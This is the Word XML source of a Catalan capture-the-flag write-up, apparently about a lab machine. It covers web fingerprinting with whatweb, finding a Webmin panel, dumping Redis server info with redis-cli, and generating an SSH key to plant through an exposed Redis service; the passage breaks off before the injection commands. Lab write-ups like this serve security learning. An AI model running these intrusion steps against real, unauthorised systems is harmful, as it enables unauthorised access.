    <w:p w14:paraId="60AD1A5A" w14:textId="77777777" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C"/>
    <w:p w14:paraId="7BA826DA" w14:textId="4FBF040E" w:rsidR="00D3214C" w:rsidRDefault="00D3214C" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">4-&gt; El que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fer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> primer es </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>veure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> quina posible </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>versio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de Ubuntu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ens</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>estem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> enfrentan </w:t>
      </w:r>
      <w:r w:rsidR="00E90A39">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E90A39">
        <w:t>Bionic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E90A39">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E9FAFB" w14:textId="3FB883AD" w:rsidR="00D3214C" w:rsidRDefault="00E90A39" w:rsidP="00D3214C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24A06050" wp14:editId="02F00D4E">
            <wp:extent cx="5400040" cy="48806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73D7" w14:textId="77777777" w:rsidR="00E90A39" w:rsidRDefault="00E90A39" w:rsidP="00D3214C"/>
    <w:p w14:paraId="00481356" w14:textId="1B0D6492" w:rsidR="00E90A39" w:rsidRDefault="00E90A39" w:rsidP="00D3214C">
      <w:r>
        <w:t xml:space="preserve">5-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Llnaçem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whatweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>veure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>quines</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tecnologies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> corren : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5436AAAD" w14:textId="77777777" w:rsidR="00E90A39" w:rsidRDefault="00E90A39" w:rsidP="00D3214C"/>
    <w:p w14:paraId="158089BF" w14:textId="77777777" w:rsidR="00E90A39" w:rsidRDefault="00E90A39" w:rsidP="00E90A39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whatweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10.129.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F311397" w14:textId="77777777" w:rsidR="00E90A39" w:rsidRDefault="00E90A39" w:rsidP="00E90A39">
      <w:r>
        <w:t xml:space="preserve">ERROR </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Opening</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: https://10.129.2.1 -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 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "10.129.2.1" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF9F7FD" w14:textId="6512DA24" w:rsidR="00E90A39" w:rsidRDefault="00E90A39" w:rsidP="00E90A39">
      <w:r>
        <w:t xml:space="preserve">http://10.129.2.1 [200 OK] Apache[2.4.29], Bootstrap, Country[RESERVED][ZZ], HTML5, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.129.2.1], JQuery, Script, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Title</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cyber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Geek's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Personal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Website</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>], X-UA-Compatible[IE=</w:t>
      </w:r>
      <w:r>
        <w:t>Edge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F35F3A" w14:textId="77777777" w:rsidR="00E90A39" w:rsidRDefault="00E90A39" w:rsidP="00E90A39"/>
    <w:p w14:paraId="132E1443" w14:textId="77777777" w:rsidR="00E90A39" w:rsidRDefault="00E90A39" w:rsidP="00E90A39"/>
    <w:p w14:paraId="0BA5B0C8" w14:textId="6D1E6B81" w:rsidR="00ED7DA1" w:rsidRDefault="00ED7DA1" w:rsidP="00E90A39">
      <w:r>
        <w:t xml:space="preserve">6-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Com</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>veiem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> que al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 80 no hi ha masa cosa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>anem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10000: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371CBB11" w14:textId="77777777" w:rsidR="00ED7DA1" w:rsidRDefault="00ED7DA1" w:rsidP="00E90A39"/>
    <w:p w14:paraId="39087065" w14:textId="47E37C47" w:rsidR="00ED7DA1" w:rsidRDefault="00ED7DA1" w:rsidP="00E90A39">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D2378F5" wp14:editId="275FA63D">
            <wp:extent cx="5400040" cy="22250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E6E5" w14:textId="77777777" w:rsidR="00ED7DA1" w:rsidRDefault="00ED7DA1" w:rsidP="00E90A39"/>
    <w:p w14:paraId="43CAA010" w14:textId="1CF4C336" w:rsidR="00ED7DA1" w:rsidRDefault="00ED7DA1" w:rsidP="00E90A39">
      <w:r>
        <w:t xml:space="preserve">I aquí si que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tenim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> un panel de log in de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Webmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AD7B56" w14:textId="77777777" w:rsidR="00ED7DA1" w:rsidRDefault="00ED7DA1" w:rsidP="00E90A39"/>
    <w:p w14:paraId="062E1457" w14:textId="4FA0A346" w:rsidR="00ED7DA1" w:rsidRDefault="00ED7DA1" w:rsidP="00E90A39">
      <w:r>
        <w:t>7-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="006E0F63">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E0F63">
        <w:t>Utilitzarem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E0F63">
        <w:t xml:space="preserve"> la Pagina de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E0F63">
        <w:t>Hack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E0F63">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E0F63">
        <w:t>Tricks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E0F63">
        <w:t xml:space="preserve"> per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E0F63">
        <w:t>veure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E0F63">
        <w:t xml:space="preserve"> una mica el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E0F63">
        <w:t>servei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E0F63">
        <w:t xml:space="preserve"> de Redis : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27739664" w14:textId="77777777" w:rsidR="006E0F63" w:rsidRDefault="006E0F63" w:rsidP="00E90A39"/>
    <w:p w14:paraId="4C6AAA36" w14:textId="5032A1AF" w:rsidR="006E0F63" w:rsidRDefault="006E0F63" w:rsidP="00E90A39">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4171A4CB" wp14:editId="7C4AAF9A">
            <wp:extent cx="5400040" cy="24168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6CC3" w14:textId="77777777" w:rsidR="006E0F63" w:rsidRDefault="006E0F63" w:rsidP="00E90A39"/>
    <w:p w14:paraId="326B03E1" w14:textId="27E12D56" w:rsidR="006E0F63" w:rsidRDefault="006E0F63" w:rsidP="00E90A39">
      <w:r>
        <w:t xml:space="preserve">8-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Entrarem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis_cli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, i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veure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tota la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>servei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> i rutes : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64802C31" w14:textId="77777777" w:rsidR="006E0F63" w:rsidRDefault="006E0F63" w:rsidP="00E90A39"/>
    <w:p w14:paraId="5129B544" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2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redis-cli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -h 10.129.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481BCB8B" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t xml:space="preserve">10.129.2.1:6379&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D5C652A" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t># Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA1FC04" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>redis_version:4.0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4DCD64" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t>redis_git_sha1:00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCD480C" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t>redis_git_dirty:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A51E295" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t>redis_build_id:9435c3c2879311f3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526E2919" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis_mode:standalone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="672B7C0C" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os:Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4.15.0-58-generic x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A42BBA5" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t>arch_bits:64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D254FE8" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>multiplexing_api:epoll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B773C24" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>atomicvar_api:atomic-builtin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="084B0826" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t>gcc_version:7.4.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41844FD4" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t>process_id:679</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF7506F" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t>run_id:3f3a4a1c64b67a1fe39281f3516c13ab57a3c1d7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D572B0" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t>tcp_port:6379</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9DA4E6" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t>uptime_in_seconds:2271</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CBF906" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t>uptime_in_days:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1D438F" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t>hz:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB57965" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t>lru_clock:966089</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFF1D97" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executable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redis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191EF41D" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>config_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/etc/redis/redis.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5387B03C" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2"/>
    <w:p w14:paraId="1780D460" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Clients</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="446033E7" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t>connected_clients:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B3F445" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t>client_longest_output_list:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AEBC41" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t>client_biggest_input_buf:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE29E1F" w14:textId="1578E481" w:rsidR="006E0F63" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>blocked_clients</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7111916B" w14:textId="77777777" w:rsidR="00EA5DB2" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2"/>
    <w:p w14:paraId="2D28CDF2" w14:textId="4A7E22C8" w:rsidR="008C65E0" w:rsidRDefault="00EA5DB2" w:rsidP="00EA5DB2">
      <w:r>
        <w:t xml:space="preserve">9-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="008C65E0">
        <w:t xml:space="preserve">El que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C65E0">
        <w:t>acabarem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C65E0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C65E0">
        <w:t>utilitzant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C65E0">
        <w:t xml:space="preserve"> será posar una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C65E0">
        <w:t>clau</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C65E0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C65E0">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C65E0">
        <w:t xml:space="preserve"> al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C65E0">
        <w:t>directori</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C65E0">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C65E0">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C65E0">
        <w:t xml:space="preserve"> de la maquina : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5069E562" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="00EA5DB2"/>
    <w:p w14:paraId="38A71BD5" w14:textId="74F8D8A5" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="00EA5DB2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="099C2436" wp14:editId="5295F779">
            <wp:extent cx="5400040" cy="44221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A409" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="00EA5DB2"/>
    <w:p w14:paraId="18509C49" w14:textId="45BFDCBA" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="00EA5DB2">
      <w:r>
        <w:t xml:space="preserve">10-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Creem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clau</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SSH al HOST : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128A1204" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="00EA5DB2"/>
    <w:p w14:paraId="159824ED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cd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CD632E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cd .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A628F56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ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4221B5DA" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>known_hosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>󰁯</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>known_hosts.old</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="224A3D58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ssh-keygen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="152027F2" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Generating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>/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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA933A0" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Enter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file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(/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>marti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  <w:r>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2E4A42" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Enter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passphrase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"/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>marti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  <w:r>
        <w:t>" (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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passphrase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE3843F" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Enter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passphrase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: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C551631" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Your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/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>marti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27411D36" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Your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in /home/</w:t>
      </w:r>
